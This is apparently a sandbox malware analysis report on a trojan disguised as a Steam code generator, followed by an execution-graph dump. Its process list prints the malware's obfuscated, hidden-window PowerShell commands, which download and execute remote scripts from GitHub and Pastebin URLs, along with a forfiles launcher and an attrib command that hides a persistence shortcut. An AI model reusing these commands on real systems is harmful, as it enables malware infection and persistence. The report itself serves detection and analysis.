                                                                                                                        Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                                                                                        Set-Cookie: __sdcfduid=d4fe07208afc11ef89f6de213a7abdd78cb30a80268c68886fb674b2426be957577606e9c7b16a1eb0a8f018c0b2595e; Expires=Sun, 14-Oct-2029 13:53:18 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                                                                        Set-Cookie: __cfruid=1ecd908642a162343fd4609e9ff981ab1b45e471-1729000398; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                                                                        2024-10-15 13:53:18 UTC211INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 63 66 75 76 69 64 3d 76 69 50 32 75 33 53 4c 71 61 37 47 4d 44 30 45 31 55 44 32 73 73 52 5a 62 5a 5a 70 43 4f 39 62 6f 4a 75 53 32 44 55 51 6b 49 41 2d 31 37 32 39 30 30 30 33 39 38 31 37 36 2d 30 2e 30 2e 31 2e 31 2d 36 30 34 38 30 30 30 30 30 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 2e 64 69 73 63 6f 72 64 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 64 33 30 34 62 36 37 63 63 64 66 32 65 34 65 2d 44 46 57 0d 0a 0d 0a
                                                                                                                        Data Ascii: Set-Cookie: _cfuvid=viP2u3SLqa7GMD0E1UD2ssRZbZZpCO9boJuS2DUQkIA-1729000398176-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8d304b67ccdf2e4e-DFW


                                                                                                                        Click to jump to process

                                                                                                                        Click to jump to process

                                                                                                                        Click to dive into process behavior distribution

                                                                                                                        Click to jump to process

                                                                                                                        Target ID:0
                                                                                                                        Start time:09:52:09
                                                                                                                        Start date:15/10/2024
                                                                                                                        Path:C:\Users\user\Desktop\steamcodegenerator.exe
                                                                                                                        Wow64 process (32bit):false
                                                                                                                        Commandline:"C:\Users\user\Desktop\steamcodegenerator.exe"
                                                                                                                        Imagebase:0x7ff71c050000
                                                                                                                        File size:258'048 bytes
                                                                                                                        MD5 hash:D4F1751389516A3DFAC98551142CB153
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Yara matches:
                                                                                                                        • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000000.00000002.3398779479.0000020C74730000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                        • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000000.00000003.2201099145.0000020C72A8E000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                        • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000000.00000002.3398378656.0000020C72A8E000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                        Reputation:low
                                                                                                                        Has exited:false

                                                                                                                        Target ID:1
                                                                                                                        Start time:09:52:09
                                                                                                                        Start date:15/10/2024
                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                        Wow64 process (32bit):false
                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                        Imagebase:0x7ff66e660000
                                                                                                                        File size:862'208 bytes
                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Reputation:high
                                                                                                                        Has exited:false

                                                                                                                        Target ID:4
                                                                                                                        Start time:09:52:16
                                                                                                                        Start date:15/10/2024
                                                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                        Wow64 process (32bit):false
                                                                                                                        Commandline:powershell.exe -command start powershell -windowstyle h -args {sal notpad iEx; sal $env:os iWr; notpad(windows_nT raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm.txt -usebasicparsing)}
                                                                                                                        Imagebase:0x7ff6e3d50000
                                                                                                                        File size:452'608 bytes
                                                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Reputation:high
                                                                                                                        Has exited:true

                                                                                                                        Target ID:6
                                                                                                                        Start time:09:52:32
                                                                                                                        Start date:15/10/2024
                                                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                        Wow64 process (32bit):false
                                                                                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" sal notpad iEx; sal $env:os iWr; notpad(windows_nT raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm.txt -usebasicparsing)
                                                                                                                        Imagebase:0x7ff6e3d50000
                                                                                                                        File size:452'608 bytes
                                                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Reputation:high
                                                                                                                        Has exited:true

                                                                                                                        Target ID:7
                                                                                                                        Start time:09:52:32
                                                                                                                        Start date:15/10/2024
                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                        Wow64 process (32bit):false
                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                        Imagebase:0x7ff66e660000
                                                                                                                        File size:862'208 bytes
                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Reputation:high
                                                                                                                        Has exited:true

                                                                                                                        Target ID:9
                                                                                                                        Start time:09:52:51
                                                                                                                        Start date:15/10/2024
                                                                                                                        Path:C:\Windows\System32\attrib.exe
                                                                                                                        Wow64 process (32bit):false
                                                                                                                        Commandline:"C:\Windows\system32\attrib.exe" +s +h "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"
                                                                                                                        Imagebase:0x7ff688dd0000
                                                                                                                        File size:23'040 bytes
                                                                                                                        MD5 hash:5037D8E6670EF1D89FB6AD435F12A9FD
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Reputation:moderate
                                                                                                                        Has exited:true

                                                                                                                        Target ID:10
                                                                                                                        Start time:09:52:51
                                                                                                                        Start date:15/10/2024
                                                                                                                        Path:C:\Windows\System32\forfiles.exe
                                                                                                                        Wow64 process (32bit):false
                                                                                                                        Commandline:"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'"
                                                                                                                        Imagebase:0x7ff75eb10000
                                                                                                                        File size:52'224 bytes
                                                                                                                        MD5 hash:9BB67AEA5E26CB136F23F29CC48D6B9E
                                                                                                                        Has elevated privileges:false
                                                                                                                        Has administrator privileges:false
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Reputation:moderate
                                                                                                                        Has exited:true

                                                                                                                        Target ID:11
                                                                                                                        Start time:09:52:51
                                                                                                                        Start date:15/10/2024
                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                        Wow64 process (32bit):false
                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                        Imagebase:0x7ff66e660000
                                                                                                                        File size:862'208 bytes
                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                        Has elevated privileges:false
                                                                                                                        Has administrator privileges:false
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Reputation:high
                                                                                                                        Has exited:true

                                                                                                                        Target ID:12
                                                                                                                        Start time:09:52:52
                                                                                                                        Start date:15/10/2024
                                                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                        Wow64 process (32bit):false
                                                                                                                        Commandline:-command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'
                                                                                                                        Imagebase:0x7ff6e3d50000
                                                                                                                        File size:452'608 bytes
                                                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                        Has elevated privileges:false
                                                                                                                        Has administrator privileges:false
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Reputation:high
                                                                                                                        Has exited:true

                                                                                                                        Target ID:13
                                                                                                                        Start time:09:52:52
                                                                                                                        Start date:15/10/2024
                                                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                        Wow64 process (32bit):false
                                                                                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
                                                                                                                        Imagebase:0x7ff6e3d50000
                                                                                                                        File size:452'608 bytes
                                                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                        Has elevated privileges:false
                                                                                                                        Has administrator privileges:false
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Reputation:high
                                                                                                                        Has exited:true

                                                                                                                        Target ID:14
                                                                                                                        Start time:09:52:59
                                                                                                                        Start date:15/10/2024
                                                                                                                        Path:C:\Windows\System32\forfiles.exe
                                                                                                                        Wow64 process (32bit):false
                                                                                                                        Commandline:"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'"
                                                                                                                        Imagebase:0x7ff75eb10000
                                                                                                                        File size:52'224 bytes
                                                                                                                        MD5 hash:9BB67AEA5E26CB136F23F29CC48D6B9E
                                                                                                                        Has elevated privileges:false
                                                                                                                        Has administrator privileges:false
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Reputation:moderate
                                                                                                                        Has exited:true

                                                                                                                        Target ID:15
                                                                                                                        Start time:09:52:59
                                                                                                                        Start date:15/10/2024
                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                        Wow64 process (32bit):false
                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                        Imagebase:0x7ff66e660000
                                                                                                                        File size:862'208 bytes
                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                        Has elevated privileges:false
                                                                                                                        Has administrator privileges:false
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Reputation:high
                                                                                                                        Has exited:true

                                                                                                                        Target ID:16
                                                                                                                        Start time:09:53:00
                                                                                                                        Start date:15/10/2024
                                                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                        Wow64 process (32bit):false
                                                                                                                        Commandline:-command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'
                                                                                                                        Imagebase:0x7ff6e3d50000
                                                                                                                        File size:452'608 bytes
                                                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                        Has elevated privileges:false
                                                                                                                        Has administrator privileges:false
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Has exited:true

                                                                                                                        Target ID:17
                                                                                                                        Start time:09:53:00
                                                                                                                        Start date:15/10/2024
                                                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                        Wow64 process (32bit):false
                                                                                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
                                                                                                                        Imagebase:0x7ff6e3d50000
                                                                                                                        File size:452'608 bytes
                                                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                        Has elevated privileges:false
                                                                                                                        Has administrator privileges:false
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Has exited:true

                                                                                                                        Reset < >

                                                                                                                          Execution Graph

                                                                                                                          Execution Coverage:3.3%
                                                                                                                          Dynamic/Decrypted Code Coverage:16.3%
                                                                                                                          Signature Coverage:15.2%
                                                                                                                          Total number of Nodes:447
                                                                                                                          Total number of Limit Nodes:29
                                                                                                                          execution_graph 18655 20c7477221c 18656 20c74772235 __scrt_is_managed_app __scrt_initialize_crt __scrt_release_startup_lock 18655->18656 18656->18655 18658 20c74772280 18656->18658 18659 20c74771360 18656->18659 18660 20c7477139e 18659->18660 18661 20c74771435 WinExec 18660->18661 18662 20c74771448 18661->18662 18663 7ff71c058f04 18684 7ff71c0590d0 18663->18684 18666 7ff71c05905b 18749 7ff71c05998c IsProcessorFeaturePresent 18666->18749 18667 7ff71c058f25 __scrt_acquire_startup_lock 18669 7ff71c059065 18667->18669 18675 7ff71c058f43 __scrt_release_startup_lock 18667->18675 18670 7ff71c05998c 7 API calls 18669->18670 18672 7ff71c059070 BuildCatchObjectHelperInternal 18670->18672 18671 7ff71c058f68 18673 7ff71c058fee 18692 7ff71c065e2c 18673->18692 18675->18671 18675->18673 18738 7ff71c0661d8 18675->18738 18677 7ff71c058ff3 18698 7ff71c052230 18677->18698 18681 7ff71c059017 18681->18672 18745 7ff71c059254 18681->18745 18685 7ff71c0590d8 18684->18685 18686 7ff71c0590e4 __scrt_dllmain_crt_thread_attach 18685->18686 18687 7ff71c058f1d 18686->18687 18688 7ff71c0590f1 18686->18688 18687->18666 18687->18667 18756 7ff71c0680fc 18688->18756 18693 7ff71c065e3c 18692->18693 18694 7ff71c065e51 18692->18694 18693->18694 18799 7ff71c065acc 18693->18799 18694->18677 18699 7ff71c052285 18698->18699 19309 7ff71c054a50 18699->19309 18701 7ff71c052328 18702 7ff71c053b80 49 API calls 18701->18702 18703 7ff71c052343 18702->18703 18704 7ff71c053b80 49 API calls 18703->18704 18705 7ff71c052390 18704->18705 18706 7ff71c053b80 49 API calls 18705->18706 18711 7ff71c0523dd ISource 18706->18711 18707 7ff71c052755 18709 7ff71c062044 _invalid_parameter_noinfo_noreturn 47 API calls 18707->18709 18708 7ff71c0524e6 SleepEx 18712 7ff71c05251e 18708->18712 18710 7ff71c05275b 18709->18710 18713 7ff71c062044 _invalid_parameter_noinfo_noreturn 47 API calls 18710->18713 18711->18707 18711->18708 18711->18710 18714 7ff71c052761 18711->18714 18716 7ff71c05252c VirtualAlloc 18712->18716 18728 7ff71c052571 ISource 18712->18728 18713->18714 18715 7ff71c062044 _invalid_parameter_noinfo_noreturn 47 API calls 18714->18715 18718 7ff71c052767 18715->18718 18717 7ff71c05254e _Yarn 18716->18717 18716->18728 18721 7ff71c05255e VirtualFree 18717->18721 18719 7ff71c062044 _invalid_parameter_noinfo_noreturn 47 API calls 18718->18719 18720 7ff71c05276d 18719->18720 18722 7ff71c062044 _invalid_parameter_noinfo_noreturn 47 API calls 18720->18722 18721->18728 18723 7ff71c052773 18722->18723 18724 7ff71c062044 _invalid_parameter_noinfo_noreturn 47 API calls 18723->18724 18725 7ff71c052779 18724->18725 18727 7ff71c062044 _invalid_parameter_noinfo_noreturn 47 API calls 18725->18727 18726 7ff71c05277f 18731 7ff71c062044 _invalid_parameter_noinfo_noreturn 47 API calls 18726->18731 18727->18726 18728->18718 18728->18720 18728->18723 18728->18725 18728->18726 18729 7ff71c05271f ISource 18728->18729 18730 7ff71c052785 18728->18730 18734 7ff71c052750 18728->18734 18732 7ff71c058d90 _invalid_parameter_noinfo_noreturn 8 API calls 18729->18732 18735 7ff71c062044 _invalid_parameter_noinfo_noreturn 47 API calls 18730->18735 18731->18730 18733 7ff71c052733 18732->18733 18743 7ff71c059adc GetModuleHandleW 18733->18743 18736 7ff71c062044 _invalid_parameter_noinfo_noreturn 47 API calls 18734->18736 18737 7ff71c05278b 18735->18737 18736->18707 18739 7ff71c066210 18738->18739 18740 7ff71c0661ef 18738->18740 19335 7ff71c068148 18739->19335 18740->18673 18744 7ff71c059aed 18743->18744 18744->18681 18746 7ff71c059265 18745->18746 18747 7ff71c05902e 18746->18747 18748 7ff71c05ae30 7 API calls 18746->18748 18747->18671 18748->18747 18750 7ff71c0599b2 memcpy_s _invalid_parameter_noinfo_noreturn 18749->18750 18751 7ff71c0599d1 RtlCaptureContext RtlLookupFunctionEntry 18750->18751 18752 7ff71c0599fa RtlVirtualUnwind 18751->18752 18753 7ff71c059a36 memcpy_s 18751->18753 18752->18753 18754 7ff71c059a68 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 18753->18754 18755 7ff71c059ab6 _invalid_parameter_noinfo_noreturn 18754->18755 18755->18669 18757 7ff71c074864 18756->18757 18758 7ff71c0590f6 18757->18758 18766 7ff71c06a7f0 18757->18766 18758->18687 18760 7ff71c05ae30 18758->18760 18761 7ff71c05ae38 18760->18761 18762 7ff71c05ae42 18760->18762 18778 7ff71c05b008 18761->18778 18762->18687 18777 7ff71c062104 EnterCriticalSection 18766->18777 18768 7ff71c06a800 18769 7ff71c071ce8 53 API calls 18768->18769 18770 7ff71c06a809 18769->18770 18771 7ff71c06a817 18770->18771 18772 7ff71c06a5f8 55 API calls 18770->18772 18773 7ff71c062158 BuildCatchObjectHelperInternal LeaveCriticalSection 18771->18773 18774 7ff71c06a812 18772->18774 18775 7ff71c06a823 18773->18775 18776 7ff71c06a6e8 GetStdHandle GetFileType 18774->18776 18775->18757 18776->18771 18779 7ff71c05b017 18778->18779 18780 7ff71c05ae3d 18778->18780 18786 7ff71c05e424 18779->18786 18782 7ff71c05e254 18780->18782 18783 7ff71c05e27f 18782->18783 18784 7ff71c05e283 18783->18784 18785 7ff71c05e262 DeleteCriticalSection 18783->18785 18784->18762 18785->18783 18790 7ff71c05e28c 18786->18790 18796 7ff71c05e376 TlsFree 18790->18796 18797 7ff71c05e2d0 __vcrt_FlsAlloc 18790->18797 18791 7ff71c05e2fe LoadLibraryExW 18793 7ff71c05e39d 18791->18793 18794 7ff71c05e31f GetLastError 18791->18794 18792 7ff71c05e3bd GetProcAddress 18792->18796 18793->18792 18795 7ff71c05e3b4 FreeLibrary 18793->18795 18794->18797 18795->18792 18797->18791 18797->18792 18797->18796 18798 7ff71c05e341 LoadLibraryExW 18797->18798 18798->18793 18798->18797 18800 7ff71c065ae5 18799->18800 18801 7ff71c065ae1 18799->18801 18822 7ff71c071270 18800->18822 18801->18694 18814 7ff71c065c94 18801->18814 18806 7ff71c065af7 18848 7ff71c068af4 18806->18848 18807 7ff71c065b03 18854 7ff71c065b40 18807->18854 18811 7ff71c068af4 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18812 7ff71c065b2a 18811->18812 18813 7ff71c068af4 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18812->18813 18813->18801 18815 7ff71c065cbd 18814->18815 18818 7ff71c065cd6 18814->18818 18815->18694 18816 7ff71c06fc34 WideCharToMultiByte std::_Locinfo::_Locinfo_ctor 18816->18818 18817 7ff71c068a7c memcpy_s 11 API calls 18817->18818 18818->18815 18818->18816 18818->18817 18819 7ff71c065d66 18818->18819 18821 7ff71c068af4 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18818->18821 18820 7ff71c068af4 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18819->18820 18820->18815 18821->18818 18823 7ff71c07127d 18822->18823 18827 7ff71c065aea 18822->18827 18873 7ff71c06a36c 18823->18873 18828 7ff71c071634 GetEnvironmentStringsW 18827->18828 18829 7ff71c065aef 18828->18829 18830 7ff71c071664 18828->18830 18829->18806 18829->18807 18831 7ff71c06fc34 std::_Locinfo::_Locinfo_ctor WideCharToMultiByte 18830->18831 18832 7ff71c0716b5 18831->18832 18833 7ff71c0716bc FreeEnvironmentStringsW 18832->18833 18834 7ff71c068b30 std::_Locinfo::_Locinfo_ctor 12 API calls 18832->18834 18833->18829 18835 7ff71c0716cf 18834->18835 18836 7ff71c0716d7 18835->18836 18837 7ff71c0716e0 18835->18837 18838 7ff71c068af4 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18836->18838 18839 7ff71c06fc34 std::_Locinfo::_Locinfo_ctor WideCharToMultiByte 18837->18839 18840 7ff71c0716de 18838->18840 18841 7ff71c071703 18839->18841 18840->18833 18842 7ff71c071707 18841->18842 18843 7ff71c071711 18841->18843 18844 7ff71c068af4 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18842->18844 18845 7ff71c068af4 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18843->18845 18846 7ff71c07170f FreeEnvironmentStringsW 18844->18846 18845->18846 18846->18829 18849 7ff71c068af9 HeapFree 18848->18849 18853 7ff71c068b28 18848->18853 18850 7ff71c068b14 GetLastError 18849->18850 18849->18853 18851 7ff71c068b21 Concurrency::details::SchedulerProxy::DeleteThis 18850->18851 18852 7ff71c064848 memcpy_s 9 API calls 18851->18852 18852->18853 18853->18801 18855 7ff71c065b65 18854->18855 18856 7ff71c068a7c memcpy_s 11 API calls 18855->18856 18868 7ff71c065b9b 18856->18868 18857 7ff71c065ba3 18858 7ff71c068af4 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18857->18858 18859 7ff71c065b0b 18858->18859 18859->18811 18860 7ff71c065c16 18861 7ff71c068af4 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18860->18861 18861->18859 18862 7ff71c068a7c memcpy_s 11 API calls 18862->18868 18863 7ff71c065c05 19303 7ff71c065c50 18863->19303 18867 7ff71c065c3b 18871 7ff71c062074 _invalid_parameter_noinfo_noreturn 17 API calls 18867->18871 18868->18857 18868->18860 18868->18862 18868->18863 18868->18867 18870 7ff71c068af4 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18868->18870 19294 7ff71c061b00 18868->19294 18869 7ff71c068af4 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18869->18857 18870->18868 18872 7ff71c065c4e 18871->18872 18874 7ff71c06a37d FlsGetValue 18873->18874 18875 7ff71c06a398 FlsSetValue 18873->18875 18876 7ff71c06a38a 18874->18876 18877 7ff71c06a392 18874->18877 18875->18876 18878 7ff71c06a3a5 18875->18878 18879 7ff71c06a390 18876->18879 18928 7ff71c064e4c 18876->18928 18877->18875 18916 7ff71c068a7c 18878->18916 18893 7ff71c070f48 18879->18893 18883 7ff71c06a3b4 18884 7ff71c06a3d2 FlsSetValue 18883->18884 18885 7ff71c06a3c2 FlsSetValue 18883->18885 18887 7ff71c06a3de FlsSetValue 18884->18887 18888 7ff71c06a3f0 18884->18888 18886 7ff71c06a3cb 18885->18886 18890 7ff71c068af4 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18886->18890 18887->18886 18923 7ff71c06a048 18888->18923 18890->18876 19119 7ff71c0711b8 18893->19119 18895 7ff71c070f7d 19134 7ff71c070c48 18895->19134 18900 7ff71c070fb3 18902 7ff71c068af4 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18900->18902 18901 7ff71c070fc2 19148 7ff71c0712ec 18901->19148 18915 7ff71c070f9a 18902->18915 18905 7ff71c0710be 18906 7ff71c064848 memcpy_s 11 API calls 18905->18906 18908 7ff71c0710c3 18906->18908 18907 7ff71c071119 18910 7ff71c071180 18907->18910 19159 7ff71c070a78 18907->19159 18911 7ff71c068af4 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18908->18911 18909 7ff71c0710d8 18909->18907 18912 7ff71c068af4 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18909->18912 18914 7ff71c068af4 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18910->18914 18911->18915 18912->18907 18914->18915 18915->18827 18921 7ff71c068a8d memcpy_s 18916->18921 18917 7ff71c068ade 18940 7ff71c064848 18917->18940 18918 7ff71c068ac2 HeapAlloc 18919 7ff71c068adc 18918->18919 18918->18921 18919->18883 18921->18917 18921->18918 18937 7ff71c065484 18921->18937 18966 7ff71c069f20 18923->18966 18980 7ff71c06f8d8 18928->18980 18943 7ff71c0654c4 18937->18943 18949 7ff71c06a410 GetLastError 18940->18949 18942 7ff71c064851 18942->18919 18948 7ff71c062104 EnterCriticalSection 18943->18948 18950 7ff71c06a451 FlsSetValue 18949->18950 18955 7ff71c06a434 18949->18955 18951 7ff71c06a441 18950->18951 18952 7ff71c06a463 18950->18952 18953 7ff71c06a4bd SetLastError 18951->18953 18954 7ff71c068a7c memcpy_s 5 API calls 18952->18954 18953->18942 18956 7ff71c06a472 18954->18956 18955->18950 18955->18951 18957 7ff71c06a490 FlsSetValue 18956->18957 18958 7ff71c06a480 FlsSetValue 18956->18958 18960 7ff71c06a4ae 18957->18960 18961 7ff71c06a49c FlsSetValue 18957->18961 18959 7ff71c06a489 18958->18959 18963 7ff71c068af4 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 18959->18963 18962 7ff71c06a048 memcpy_s 5 API calls 18960->18962 18961->18959 18964 7ff71c06a4b6 18962->18964 18963->18951 18965 7ff71c068af4 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 18964->18965 18965->18953 18978 7ff71c062104 EnterCriticalSection 18966->18978 19014 7ff71c06f890 18980->19014 19019 7ff71c062104 EnterCriticalSection 19014->19019 19120 7ff71c0711db 19119->19120 19121 7ff71c0711e5 19120->19121 19174 7ff71c062104 EnterCriticalSection 19120->19174 19123 7ff71c071257 19121->19123 19126 7ff71c064e4c BuildCatchObjectHelperInternal 47 API calls 19121->19126 19123->18895 19128 7ff71c07126f 19126->19128 19130 7ff71c0712c2 19128->19130 19131 7ff71c06a36c 52 API calls 19128->19131 19130->18895 19132 7ff71c0712ac 19131->19132 19133 7ff71c070f48 67 API calls 19132->19133 19133->19130 19175 7ff71c064868 19134->19175 19137 7ff71c070c7a 19139 7ff71c070c8f 19137->19139 19140 7ff71c070c7f GetACP 19137->19140 19138 7ff71c070c68 GetOEMCP 19138->19139 19139->18915 19141 7ff71c068b30 19139->19141 19140->19139 19142 7ff71c068b7b 19141->19142 19143 7ff71c068b3f memcpy_s 19141->19143 19145 7ff71c064848 memcpy_s 11 API calls 19142->19145 19143->19142 19144 7ff71c068b62 HeapAlloc 19143->19144 19147 7ff71c065484 std::_Facet_Register 2 API calls 19143->19147 19144->19143 19146 7ff71c068b79 19144->19146 19145->19146 19146->18900 19146->18901 19147->19143 19149 7ff71c070c48 49 API calls 19148->19149 19150 7ff71c071319 19149->19150 19151 7ff71c07146f 19150->19151 19153 7ff71c071356 IsValidCodePage 19150->19153 19158 7ff71c071370 memcpy_s 19150->19158 19152 7ff71c058d90 _invalid_parameter_noinfo_noreturn 8 API calls 19151->19152 19154 7ff71c0710b5 19152->19154 19153->19151 19155 7ff71c071367 19153->19155 19154->18905 19154->18909 19156 7ff71c071396 GetCPInfo 19155->19156 19155->19158 19156->19151 19156->19158 19207 7ff71c070d60 19158->19207 19293 7ff71c062104 EnterCriticalSection 19159->19293 19176 7ff71c06488c 19175->19176 19182 7ff71c064887 19175->19182 19177 7ff71c06a298 _Getctype 47 API calls 19176->19177 19176->19182 19178 7ff71c0648a7 19177->19178 19183 7ff71c068b90 19178->19183 19182->19137 19182->19138 19184 7ff71c0648ca 19183->19184 19185 7ff71c068ba5 19183->19185 19187 7ff71c068bfc 19184->19187 19185->19184 19191 7ff71c073264 19185->19191 19188 7ff71c068c24 19187->19188 19189 7ff71c068c11 19187->19189 19188->19182 19189->19188 19204 7ff71c0712d0 19189->19204 19192 7ff71c06a298 _Getctype 47 API calls 19191->19192 19193 7ff71c073273 19192->19193 19194 7ff71c0732be 19193->19194 19203 7ff71c062104 EnterCriticalSection 19193->19203 19194->19184 19205 7ff71c06a298 _Getctype 47 API calls 19204->19205 19206 7ff71c0712d9 19205->19206 19208 7ff71c070d9d GetCPInfo 19207->19208 19209 7ff71c070e93 19207->19209 19208->19209 19215 7ff71c070db0 19208->19215 19210 7ff71c058d90 _invalid_parameter_noinfo_noreturn 8 API calls 19209->19210 19212 7ff71c070f32 19210->19212 19212->19151 19218 7ff71c06f1d0 19215->19218 19219 7ff71c064868 TranslateName 47 API calls 19218->19219 19220 7ff71c06f212 19219->19220 19238 7ff71c06fba4 19220->19238 19240 7ff71c06fbad MultiByteToWideChar 19238->19240 19295 7ff71c061b0d 19294->19295 19296 7ff71c061b17 19294->19296 19295->19296 19301 7ff71c061b32 19295->19301 19297 7ff71c064848 memcpy_s 11 API calls 19296->19297 19298 7ff71c061b1e 19297->19298 19299 7ff71c062024 _invalid_parameter_noinfo 47 API calls 19298->19299 19300 7ff71c061b2a 19299->19300 19300->18868 19301->19300 19302 7ff71c064848 memcpy_s 11 API calls 19301->19302 19302->19298 19304 7ff71c065c55 19303->19304 19308 7ff71c065c0d 19303->19308 19305 7ff71c065c7e 19304->19305 19306 7ff71c068af4 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19304->19306 19307 7ff71c068af4 